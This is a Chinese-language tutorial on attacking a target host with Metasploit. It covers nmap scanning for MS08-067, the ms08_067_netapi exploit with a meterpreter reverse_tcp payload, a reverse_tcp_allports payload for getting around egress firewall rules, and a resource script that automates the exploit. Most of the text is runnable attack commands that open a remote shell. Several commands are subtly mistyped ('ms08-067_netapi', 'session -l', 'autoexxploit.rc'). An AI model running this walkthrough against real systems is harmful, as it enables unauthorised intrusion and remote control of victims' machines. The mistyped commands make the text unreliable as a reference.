以下利用metasploit攻击网站的具体思路:
1、先判断开放了哪些端口
nmap -sT -A --script=smb-vuln-ms08-067 -P0 192.167.2.2
2、根据开放的端口服务,寻找相应的漏洞攻击模块
search ms08-067_netapi
use exploit/windows/smb/ms08-067_netapi
show payload 寻找适合这个模块的攻击载荷
set payload windows/meterpreter/reverse_tcp
show options 查看需要设置哪些参数
set LHOST xxxx
set RHOST xxx
set LPORT xx
exploit 对目标尝试攻击。
反弹回 meterpreter shell
在上面的例子中,我们之所以能够成功,主要是由于目标主机反弹连接使用的端口没有被过滤掉。但是如果我们攻击的组织内部设置了非常严格的出站端口怎么办?我们可以猜测443端口没有被防火墙禁止,同样的可能还有FTP、telnet、ssh等服务使用的端口,可以逐一尝试。。幸运的是,metasploit提供了一个专用的攻击载荷帮助我们找到这些放行的端口。。
下面我们使用这个攻击载荷,让它尝试对所有端口进行连接,直到找到成功连接的端口为止。。
use exploit/windows/smb/ms08-067_netapi
set LHOST xxxx
set RHOST xxx
set LPORT xx
search ports
set payload windows/meterpreter/reverse_tcp_allports
exploit -j 返回结果会显示出与目标主机的哪个端口建立了连接。。
session -l -v 返回session 的 ID
session -i id号
最后反弹回 meterpreter
以下是一些其他相关信息:
资源文件:是msf终端内包含一系列自动化命令的脚本文件。。。
比如: echo use exploit/windows/smb/ms08_067_netapi > autoexploit.rc
echo set RHOST 1.2.3.2 >> autoexploit.rc
echo exploit >> autoexploit.rc (此处有省略)
进入msf终端 运行 resource autoexxploit.rc 回车
autoexploit.rc文件内的命令就会依次执行。。。。可以大大减少测试和开发的时间。。。